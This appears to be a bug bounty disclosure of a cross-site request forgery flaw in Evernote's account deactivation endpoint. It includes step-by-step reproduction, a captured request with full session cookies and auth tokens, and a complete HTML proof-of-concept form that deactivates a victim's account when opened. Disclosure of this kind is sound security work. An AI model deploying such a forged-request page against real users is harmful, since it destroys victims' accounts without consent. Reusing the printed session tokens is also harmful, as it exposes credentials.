CSRF leads to account deactivation of users

Step to reproduce vulnerability:- 1) Create 2 account one account is for attacker and one is for victim 2) With attacker account go to https://www.evernote.com/secure/CloseAccount.action 3) Open your burpsuite and when you will press Deactivate your Evernote account you will see another popup of Before you go, we recommend... just check the reviewed and continue 4) Select that why you want to deactivate and Then press Deactivate account 5) Capture the request with burpsuite intercept on 6) Request be like:- POST /secure/CloseAccount.action?accountAction=deactivateAccount&json=true HTTP/1.1 Host: www.evernote.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 202 Origin: https://www.evernote.com Connection: close Referer: https://www.evernote.com/secure/CloseAccount.action Cookie: web50017PreUserGuid=03325c9c-10bb-4705-a4db-08fde2343592; cookieTestValue=1615353230618; JSESSIONID=761EB90EE2758BBF63CDDD3D14D0DC97; userdata_lastLoginTime=1615353238172; userdata_accountType=BASIC; userdata_acctCreatedTime=1615353237000; lastAuthentication=1615353238363/8690e8a01b1354ef467f4db8066ea718; Ue9i0JAw=AK6vKhp4AQAAxbQuLjpIXLkJispAAhdLVUZDhggqGkbuCWLCXGuv2aD-bibs; last-web-version-used=Ion-on-Conduit; promoCode=86fe54e944118fc779bacb7705f6bb40; optimizelyEndUserId=oeu1615346790816r0.5547674269987128; iterableEndUserId=xacoyi5848%40nobitcoin.net; iterableEmailCampaignId=1406900; iterableTemplateId=1952543; iterableMessageId=31ec3758a6e446caa50aa9378227df08; EB_Partial_Sign_Up_Email_Capture_Variant=B_PartialCapture; WEB_51151_EB_Sign_Up_Zendesk_Chat_Variant=A_Control; _dd_s=logs=1&id=544a2ceb-8bca-4321-9826-588de3b14daf&created=1615352249296&expire=1615354270436; auth="S=s417:U=d645f78:E=1781ac54117:C=1781a8e529b:P=5fd:A=en-web:V=2:H=f7a20a70086b721eb3990baf142c7c9d"; userdata_loggedIn=true; clipper-sso="S=s417:U=d645f78:E=17f723f7ea4:C=1781a8e52a5:P=1d5:A=en-chrome-clipper-xauth-new:V=2:H=4c1ac923c3fa5f2f5f36681ac30a0ecb"; req_sec="U=d645f78:P=/:E=1781a9d4be9:S=bd223e7b10ca33bccfc72769f7584122" Sec-GPC: 1 password=&oneTimeCode=&captchaResponse=&reasons%5Banalytic%5D=specify-reason-different-app&reasons%5Bi18nKey%5D=CloseAccountAction.accountActionSurvey.differentApp&reasons%5Bchecked%5D=true&otherReason= 6) Now do right click on request go to Engagement Tools then go to Generate CSRF PoC and Copy HTML 7) CSRF POC be like:- <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://www.evernote.com/secure/CloseAccount.action?accountAction=deactivateAccount&json=true" method="POST"> <input type="hidden" name="password" value="" /> <input type="hidden" name="oneTimeCode" value="" /> <input type="hidden" name="captchaResponse" value="" /> <input type="hidden" name="reasons&#91;analytic&#93;" value="specify&#45;reason&#45;different&#45;app" /> <input type="hidden" name="reasons&#91;i18nKey&#93;" value="CloseAccountAction&#46;accountActionSurvey&#46;differentApp" /> <input type="hidden" name="reasons&#91;checked&#93;" value="true" /> <input type="hidden" name="otherReason" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> 8) Then make a file with Csrf.html and paste the html POC in it and save it 9) When attacker will send this html file to victim and when victim will click on it this account will get Deactivate Video POC link:- https://drive.google.com/file/d/12IJOyqVxIOqG_vTWKVJ3qwG7GTn-fV-f/view?usp=sharing ## Impact Attacker can Deactivate victim premium accounts, And you will lost your good customer for this security flaws